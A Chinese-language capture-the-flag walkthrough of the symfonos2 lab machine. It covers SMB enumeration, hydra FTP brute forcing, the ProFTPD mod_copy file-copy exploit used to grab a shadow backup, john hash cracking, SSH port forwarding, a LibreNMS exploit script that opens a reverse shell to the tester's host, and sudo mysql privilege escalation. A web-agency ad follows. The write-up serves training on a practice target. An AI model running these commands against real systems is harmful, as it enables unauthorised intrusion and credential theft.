从hash碰撞到ssh端口转发渗透内网:靶机练习之symfonos2
2026/7/24 5:53:32 网站建设 项目流程

信息搜集

nmap -sn 192.168.8.0/24

nmap -sT --min-rate 10000 192.168.8.7 -p

重点关注445和21端口,一个smb一个ftp,这两个都是有关存储的

nmap -sT -sC -sV -O 192.168.8.7 -p21,22,80,139,445 -oA ports

smb渗透

enum4linux 192.168.8.7 -e US

有个匿名登录

smbclient //192.168.8.7/anonymous

有一个日志文件

mget logs.txt

泄露文件分析

存储了一个shadow.bak密码文件到备份文件夹

泄露了一个ftp用户名

ftp渗透

之前端口扫描的时候探测到了,ftp的版本

ftp爆破

之前文件泄露中拿到了一个文件名,尝试进行爆破,这个等待时间较长

hydra -l aeolus -P /usr/share/wordlists/rockyou.txt -f ftp://192.168.8.7

ps:第一次打的时候爆破出来了,第二次耗了两个小时才出来,这个应该不是常规路径,不推荐

未授权文件复制漏洞利用

有历史漏洞,但是目录没有写入权限,没有办法直接反弹shell

尝试文件复制,把shadow.bak文件复制到smb共享文件夹中


ftp> site cpfr /var/backups/shadow.bak 350 File or directory exists, ready for destination name ftp> site cpto /home/aeolus/share/shadow.bak 250 Copy successful

下载shadow文件

hash碰撞

john pass.hash --wordlist=/usr/share/wordlists/rockyou.txt

拿到第一个凭证

aeolus$sergioteamo

内网渗透

ss -ntlp

发现内网还有一个8080端口服务

ssh内网端口转发

ssh -L 8080:127.0.0.1:8080 aeolus@192.168.8.7 -N -L 参数详解 格式:-L [本地地址:]本地端口:目标地址:目标端口 -L 8080:127.0.0.1:8080 ↑ ↑ ↑ 本地端口 目标地址 目标端口 - 8080(本地端口)— 你本机监听 8080 端口 - 127.0.0.1(目标地址)— 这是相对于远程主机的地址,即远程主机的 localhost - 8080(目标端口)— 远程主机上 127.0.0.1:8080 的服务端口 数据流向 你的电脑:8080 ──SSH加密隧道──> 192.168.8.7 ──> 192.168.8.7:8080 (本机服务) 当你访问 http://127.0.0.1:8080 时,流量会被 SSH 加密后转发到 192.168.8.7,然后由远程主机访问它自己的 127.0.0.1:8080。 典型使用场景 远程主机 192.168.8.7 上运行了一个只监听 localhost 的服务(如 Web 管理面板、数据库、API 服务),这个服务不对外网暴露。通过这条命令,你可以安全地在你本地直接访问该服务,就像它在本地运行一样。 -N 的作用 不加 -N 的话,SSH 连接后会给你一个远程 shell。加上 -N 表示"不执行远程命令",连接建立后终端会挂起,只维持隧道,不打开 shell。适合单纯做端口转发时使用。

发现是一个librenms服务

librenms渗透

尝试用刚才获取的凭证,成功登录后台

查找漏洞利用

searchsploit librenms

查看利用方式,发现需要登录的cookie

burp登录抓包,拿到cookie

python2 47044.py http://127.0.0.1:8080/ "PHPSESSID=sr2acfp9qithdfben944bgrmh6; XSRF-TOKEN=eyJpdiI6ImZJWUtCRjB2Q3AwM1UzNWJPTWJjbnc9PSIsInZhbHVlIjoiVzRzOHkzZ1wvUDNMcWticUl1REdGMDUxTmVqRTlGT2U0cCtFT1JZTTNkMFh5T0V5NWtOQTRyR291TkI5K1NXVDB1Ukoyb0pDQVUrZG1MQnBKaStcLzlkZz09IiwibWFjIjoiOTEzODY1ZTJlMjRhZGE0ODIzZWYwM2Y4YjE2MDNjMWU1MTMxNTBjNDFkMTE5NWRjOTVjM2QxNTVmMTMzMTg4ZiJ9; librenms_session=eyJpdiI6IjF0OVZPSUtsOU5pSnNMMEl5eld2RWc9PSIsInZhbHVlIjoiOWoxSFM2cmV4Mm13S0pXRzd1RG55T1duc2srNEk0VGtrUDRqNlFKZmtyWVpLRlQ1Zk0zS2hlXC85RWNpd1wva0RVRThZdVJiazFZWTltRmpFeTdkeGJLUT09IiwibWFjIjoiZjM5ZTk5ZTQyOGRhNDEwNWZiNGYyMTc0ZjQyMjc3NmRkOTk0MGY1YmMyYzc2MDExMWEwN2U3ZmQxNWQ4YzM5YiJ9" 192.168.8.11 4444

启动msf

配置参数

成功拿到shell

sudo提权

sudo -l

可以免密执行sudo权限的mysql

GTFOBINs提权

成功提权

补充一个兔子洞

内网还有一个邮件服务,exim 4.89

有一个本地提权漏洞,似乎无法成功利用

小结一下

靶机整理难度不高,主要是针对smb泄露文件,展开两条思路进一步攻击;一个是用户名aeolus去爆破;一个是shadow备份文件和共享文件路径泄露,通过proftpd文件复制漏洞,拿到shadow备份文件,进行hash碰撞;后面的内网渗透,ssh端口转发,思路都非常流畅,是一台很好的练手的靶机

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询